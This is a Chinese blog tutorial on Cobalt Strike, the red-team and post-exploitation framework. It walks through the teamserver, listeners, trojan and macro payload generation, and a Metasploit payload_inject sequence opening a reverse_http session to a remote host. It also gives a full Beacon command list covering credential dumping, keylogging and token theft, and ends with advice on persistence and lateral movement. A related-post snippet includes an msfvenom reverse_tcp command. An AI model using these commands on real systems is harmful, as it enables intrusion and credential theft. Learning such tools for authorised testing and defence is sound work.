Cobalt Strike 简单使用

于 2019-08-29 17:50:52 发布 3975 收藏 9
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csacs/article/details/100100568
版权

Cobalt Strike 简单使用

  • 我在最没有能力的年纪,碰见了最想照顾一生的人。

概述:

  • Cobalt Strike是一款内网渗透测试神器,一个服务端,多个客户端,这样最大好处就是可以团队合作。Cobalt Strike集成了很多工具,如多模式监听(dns.smb等)、多种代理转发,自定义脚本以及生成各种版本木马,各种病毒,各种payload,进行网站克隆,钓鱼攻击等等,更方便快速的获取权限,进行权限维持,横向攻击等等。

启动:

服务端:首先在vps进行搭建启动 ./teamserver vpsip 密码
在这里插入图片描述
客户端:输入vpsip 密码,即可登陆
在这里插入图片描述

基本操作:

首先介绍监听(listeners)模块,
主要有9个不同服务的监听,分两个大块beacon和foreign
Beacon主要就是给cs自己反弹shell的
Foreign主要是给外部msf、meterpreter反弹一个shell,以便于内网攻击
在这里插入图片描述
内部就是生成payload,直接反弹即可。
cs结合msf互传:

  • cs传给msf
    msf监听
    在这里插入图片描述
    cs中添加forgein监听,然后cs中spawn即可。
    在这里插入图片描述

  • msf传cs
    利用payload_inject模块,msf下

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set disablepayloadhandler true
set lhost 1.1.1.1
set lport 8888
set session 1
run
即可

各有各优点,dns隐秘性好、https加密通信、smb在内网使用(配合一台主机作为中转器,配合无状态木马使用,向另外一台无法访问到的内网主机进行反弹shell。)等等。
监听完即可生成payload去攻击,cs提供很多payload
在这里插入图片描述

HTML Application 生成HTA木马文件
MS Office Macro 生成office宏病毒文件
Payload Generator 生成各种语言版本的payload
USB/CD AutoPlay 生成利用自动播放运行的木马文件
Windows Dropper 把木马捆绑到文件上点击即可反弹shell
Windows Executable  生成可执行exe、dll木马
Windows Executable(S ) 生成可执行exe、dll木马、powershell等

拿到shell就可以继续搞,主要介绍以下几个模块
在这里插入图片描述

  • Interact beacon命令行
    shell +cmd命令
    需要用到的命令直接help即可
    在这里插入图片描述
Beacon Commands
===============

    Command                   Description
    -------                   -----------
    argue                     进程参数欺骗
    blockdlls                 在子进程中阻止非Microsoft的DLLs文件
    browserpivot              注入受害者浏览器进程
    bypassuac                 绕过UAC
    cancel                    取消正在进行的下载
    cd                        切换目录
    checkin                   强制让被控端回连一次
    clear                     清除beacon内部的任务队列
    connect                   通过TCP连接到Beacon
    covertvpn                 部署Covert VPN客户端
    cp                        复制文件
    dcsync                    从DC中提取密码哈希
    desktop                   远程VNC
    dllinject                 反射DLL注入进程
    dllload                   使用LoadLibrary将DLL加载到进程中
    download                  下载文件
    downloads                 列出正在进行的文件下载
    drives                    列出目标盘符
    elevate                   尝试提权
    execute                   在目标上执行程序(无输出)
    execute-assembly          在目标上内存中执行本地.NET程序
    exit                      退出beacon
    getprivs                  对当前令牌启用系统权限
    getsystem                 尝试获取SYSTEM权限
    getuid                    获取用户ID
    hashdump                  转储密码哈希值
    help                      帮助
    inject                    在特定进程中生成会话
    jobkill                   杀死一个后台任务
    jobs                      列出后台任务
    kerberos_ccache_use       从ccache文件中导入票据应用于此会话
    kerberos_ticket_purge     清除当前会话的票据
    kerberos_ticket_use       从ticket文件中导入票据应用于此会话
    keylogger                 键盘记录
    kill                      结束进程
    link                      通过命名管道连接到Beacon
    logonpasswords            使用mimikatz转储凭据和哈希值
    ls                        列出文件
    make_token                创建令牌以传递凭据
    mimikatz                  运行mimikatz
    mkdir                     创建一个目录
    mode dns                  使用DNS A作为通信通道(仅限DNS beacon)
    mode dns-txt              使用DNS TXT作为通信通道(仅限D beacon)
    mode dns6                 使用DNS AAAA作为通信通道(仅限DNS beacon)
    mode http                 使用HTTP作为通信通道
    mv                        移动文件
    net                       net命令
    note                      给当前目标机器备注       
    portscan                  进行端口扫描
    powerpick                 通过Unmanaged PowerShell执行命令
    powershell                通过powershell.exe执行命令
    powershell-import         导入powershell脚本
    ppid                      为生成的post-ex任务设置父PID
    ps                        显示进程列表
    psexec                    使用服务在主机上生成会话
    psexec_psh                使用PowerShell在主机上生成会话
    psinject                  在特定进程中执行PowerShell命令
    pth                       使用Mimikatz进行传递哈希
    pwd                       当前目录位置
    reg                       查询注册表
    rev2self                  恢复原始令牌
    rm                        删除文件或文件夹
    rportfwd                  端口转发
    run                       在目标上执行程序(返回输出)
    runas                     以另一个用户权限执行程序
    runasadmin                在高权限下执行程序
    runu                      在另一个PID下执行程序
    screenshot                屏幕截图
    setenv                    设置环境变量
    shell                     cmd执行命令
    shinject                  将shellcode注入进程
    shspawn                   生成进程并将shellcode注入其中
    sleep                     设置睡眠延迟时间
    socks                     启动SOCKS4代理
    socks stop                停止SOCKS4
    spawn                     生成一个会话 
    spawnas                   以其他用户身份生成会话
    spawnto                   将可执行程序注入进程
    spawnu                    在另一个PID下生成会话
    ssh                       使用ssh连接远程主机
    ssh-key                   使用密钥连接远程主机
    steal_token               从进程中窃取令牌
    timestomp                 将一个文件时间戳应用到另一个文件
    unlink                    断开与Beacon的连接
    upload                    上传文件
    wdigest                   使用mimikatz转储明文凭据
    winrm                     使用WinRM在主机上生成会话
    wmi                       使用WMI在主机上生成会话

  • Access

    dump hashes 获取hash即可碰撞md5
    Elevate 一键提权(内置很多,可上传如CVE-2019-0803、或beacon利用Powershell提权等)
    Golden Ticket 生成黄金票据注入当前会话
    MAke token 凭证转换
    Run Mimikatz =beacon(logonpasswords)抓取windows明文密码
    Spawn As 分享给队友

  • Explore
    Browser Pivot 劫持浏览器进行代理
    Desktop(VNC) 开启桌面交互
    File Browser 文件管理上传等等
    Net View 查询信息
    Port scan 端口扫描(ARP,ICMP等扫描)
    Process list 查看进程(可以注入进行获取新shell、监听键盘等)
    Screenshot 截图

  • Pivoting
    SOCKS Server 开启SOCKS 代理服务
    Listener 反向端口转发
    Deploy VPN 部署VPN

  • Spawn 新的通讯模式并生成会话

  • Session 会话管理,删除,心跳时间,退出,备注

    拿到权限后,权限维持很重要,比如常见的注册表、设置启动项、计划任务、设置服务、dll劫持等
    进而进行横向移动,横扫内网,比如扫描其他主机端口、弱口令、中间件漏洞等等,也可以利用psexec选择凭证进行攻击或者进程中steal token 窃取,或者可以上传插件利用其他漏洞如最常见ms08-067、ms17010、以及IE双杀漏洞等等

    余生很长,请多指教。
    在这里插入图片描述

SoulCat.
关注
专栏目录
相关推荐
下载
Aggressor:Ladon for Cobalt Strike、大型网络渗透扫描器、漏洞利用检测 MS17010 passwordbrute-forcepsexecatexecsshexecwebshel​​lsmbexecnetcatosscannetscanstruts2PocweblogicExp
05-31
Ladon for Cobalt Strike Ladon For Cobalt Strike Ladon 7.7 For Cobalt Strike 中文GUI 信息收集/存活主机/服务识别/端口扫描 高危漏洞检测 网络服务密码爆破 远程执行/横向移动 MSF、NC联动/一键反弹 程序简介 Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。7.0版本内置83个功能模块,外部模块18个,通过多种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、数据库等信息,漏洞检测包含MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat
博客
Cobaltstrike简介、安装及简单使用
LUOBIKUN的博客
09-21 4844
Cobaltstrike简介、安装及简单使用 工具分享: CS4.0 链接:https://pan.baidu.com/s/1kCxYpdjgVWSSgEFObU0nLw 提取码:38pz 工具介绍 Cobalt Strike 是一款使用java编写,C / S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透,是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动。 组成 Cobalt Strike 分为客户端组件和服务器组件。 服务器组件
博客
简单使用工具提取cobalt strike
最新发布
kernweak的博客
10-28 217
针对hw,很多红队开发人员,都是简单加工了下CS马,套了层外壳,针对于这类样本的分析提取CS,可以使用工具快速分析提取CS的beacon,并不要什么太多操作。 首先拿到样本,先常规提取恶意PE文件。使用pe-sieve工具。 https://github.com/hasherezade/pe-sieve 比如提取后这种未命名的就是马所在。 如果套了几层,可以关键API下断,手动dump出内存,不过国内hw那些样本大部分都是简单构造。 再判断恶意代码是否为CobaltStrike,比如实例这里,IDA看到
博客
巨龙拉冬:让你的Cobalt Strike变成超级武器
K8哥哥
10-24 1195
Cobalt Strike巨龙拉冬插件9.0发布,让大家久等了,就当是程序员节礼物。原计划是Ladon8.0的时候出的,当时也实现了部份功能,但因为放在虚拟机里,可能误删了没备份,也因为各种事懒得重写,拖着拖着Ladon已出到9.0了,也想国庆写,但国庆又想上王者,于是又拖到最近两天才重写插件,CS右键已实现90%的功能部分功能请先在Beacon命令行使用。巨龙拉冬中文插件和Ladon英文插件的区别是右键菜单功能更全,英文的菜单让很多不熟的人,误以为Ladon并没让CS加强多少功能,而有些知道Ladon功.
博客
cobalstrick使用_Cobalt Strike简单使用
weixin_30038009的博客
12-23 182
---恢复内容开始---一、介绍:后渗透测试工具,基于Java开发,适用于团队间协同作战,简称“CS”。CS分为客户端和服务端,一般情况下我们称服务端为团队服务器,该工具具有社工功能(社会工程学攻击),团队服务器可以帮助我们收集信息以及管理日记记录,Linux中需要以root权限开启团队服务器,Windows中以管理员开启团队服务器。二、步骤Step1:开启团队服务器(其中serverIP一般为当...
博客
Cobalt Strike下的快速横向扩展
Azjj
09-12 2337
C2下的横向移动 本来打算今天早点睡的,奈何小区内的施工也不知道脑子怎么想的,凌晨大半夜的各种发动机嗡嗡响,实在是睡不着,想了下,写个文章来记录一下自己最近实战中的一些经验吧。 1.前言 在红队人员拿到一台内网机器后,会进一步利用此权限进行内网的横向移动,从而进一步拿下内网更多的权限。本文只要是总结利用c2快速,简单有效的一个横向扩展。 2.提权 拿到一台内网服务器,如果权限不高的情况下,可能对我们后续的渗透比较局限,所以我们需要先提升到system权限 在C2中有直接提权的exp,官方.
博客
MS17010原生打法
GGyao的博客
08-18 711
1、针对入口跳板机已经CS上线但是因为目标所在区域代理出来的流量卡慢、扫描会导致代理隧道崩溃、MSF的17010不成功但是原生利用工具成功的场景。此工具是由最原版调用fb.py那版提取出来的(原生版是最为稳定,并且能利用的版本)。 项目地址:https://github.com/TolgaSEZER/EternalPulse msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.3.128 LPORT=4443 -f dll > x
博客
cobaltstrike3.8服务器搭建及使用
weixin_33881753的博客
10-31 880
参考链接: https://www.ezreal.net/archives/166.htmlhttp://blog.cobaltstrike.com/category/cobalt-strike-2/ cobaltstrike作者博客https://wujunze.com/wooyun/drops/Cobalt%20Strike%20之团队服务器的搭建与DNS通讯演示.html   ...
博客
cobaltstrike简单使用
m0_53603468的博客
12-30 492
文章目录前言一、使用步骤打开软件二、渗透步骤三、攻击成功后总结遇到的问题: 前言 Cobalt Strike 一款以Metasploit为基础的GUI框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell木马生成等。 钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等。 Cobalt Strike 主要用于团队作战,可谓是团队渗透神器,能让多个攻击者同时连接到团体服务器上,共享攻击资源与目标信息和sessions。 Cobalt Stri.
博客
利用cobalt strike获取域控权限
mirror97black的博客
04-02 2047
cobalt strike cobalt strike是一个后渗透工具,和msf有很多相似的地方,也可以看做是一个远控工具。 前期准备 获取一个cobalt strike的会话。可以利用cs本身的payload,或者是通过别的shell反弹到cs。 域内收集信息 通过一些cmd命令,可以收集到域内的信息 在cs的会话中,执行命令 查看有多少域和工作组 shell net...
博客
cobalt strike 使用(一)
qq_40624810的博客
07-26 407
背景 前两天安装好了cs,今天趁着周末试试怎么使用,结果弄了半天没有成功上线过一次靶机。换了个方式结果都行了。赶紧写个博客记录下。 一、本地连接 在无数次连接不到靶机后,我果断放弃了用公网服务器作为服务端的方式。 我用kali同时作为服务端和客户端尝试 1.服务端 启动服务端,同样的命令只不过ip改成kali内网的ip 2.客户端 因为是linux下所以不能在cobalstrike目录下用命令启动 java -XX:+AggressiveHeap -XX:+UseParallelGC
博客
git
qq_43573853的博客
10-10 29
1 git基本信息配置 git config -global user.name '用户名' //设置用户名 git congig -global user.email '用户邮箱' //设置用户邮箱 git congig -list //查看配置 2 git初始化 git init //生成.git文件 3 查看文件状态 git status 4 将文件从工程区添加到暂存区 git add '文件名' git add . //将所有文件添加到暂存区 4.1 取消暂存 git reset '文
博客
Cobalt Strike第三篇简单使用
千寻的博客
06-17 123
文章目录0x01创建监听器0x02生成木马0x03开启web服务0x04 运行木马0x05返回CS即可看到0x06 执行命令0x07导出报告摘抄 0x01创建监听器 点击Cobalt Strike -> Listeners->Add,其中内置了九个Listener 0x02生成木马 点击Attacks->Packages->HTML Application, 选择对应的监听器,方法这里有三种(executable/VBA/powershell) 选择powershell, 点.
博客
CobaltStrike使用
weixin_44110913的博客
07-29 4842
目录 CobaltStrike CobaltStrike的安装 CobaltStrike使用 CobaltStrike模块 创建监听器Listener 创建攻击Attacks HTML Application MS Office Macro Payload Generator Windows Executable & Windows Executable(S)  Web Drive-by&...
博客
Cobalt Strike汉化版——安装与使用教程
W小哥
04-12 5061
安装教程
博客
cobalt strike中的一些小知识点的理解
热门推荐
Shanfenglan's blog
08-04 35万+
我眼中的beacon与beacon stage/stager beacon指的是受害者与我们的teamserver所建立的这个连接,也可以理解成我们所获的的对方主机的控制权,beacon stage/stager是生成的可执行文件。 什么是stage(stageless)? stage是无阶段的stager,可以直接理解成,stage是stager与它所请求的数据的集合体。stage比stager更安全,但是体积更大。而且在内网穿透的时候基本只能用stage,用stager会十分麻烦,stag.
博客
cobaltstrike安装_Cobaltstrike系列教程(八)截图与浏览器代理
weixin_39730801的博客
11-30 294
0x000-前文Cobaltstrike系列教程(一)简介与安装Cobaltstrike系列教程(二)Listner与Payload生成Cobaltstrike系列教程(三)beacon详解Cobaltstrike系列教程(四)菜单栏与视图Cobaltstrike系列教程(五)凭据导出Cobaltstrike系列教程(六)文件/进程管理与键盘记录Cobaltstrike系列教程(七)端口...
博客
渗透工具之CS4.0使用说明书
m0_59991869的博客
10-14 2567
CS4.0使用说明书 目录 安装 使用 运行 监听器 listner 使用 不同监听介绍 木马 生成后门 钓鱼攻击 邮件钓鱼 功能 上部选项栏 下部工具栏 beacon的使用 会话功能 安装使用 安装 系统环境:需要java环境Oracle Java 1.8,Oracle Java 11 下载解压就可以使用 使用 首先要运行服务端,如果你有个外网的机器,可以把服务端运行于外网的机器上,也可以运行于本地 服务端启动命令 windows 运行teamserver
博客
CobaltStrike4.0环境配置及使用
CKCsec的博客
07-09 1265
CobaltStrike4.0环境配置及使用 Cobaltstrike简介 Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界人称为CS,其拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等功能。分为服务端(teamserver)和客户端,服务端是一个,客户端可以有多个,团队可进行分布式协团操作。客户端可在windows上运行,服务端必须在Linux上,且两者都需Java环境。 环境搭建 CobaltStrike4.0

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
©️2022 CSDN 皮肤主题:技术黑板 设计师:CSDN官方博客 返回首页

打赏作者

SoulCat.

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值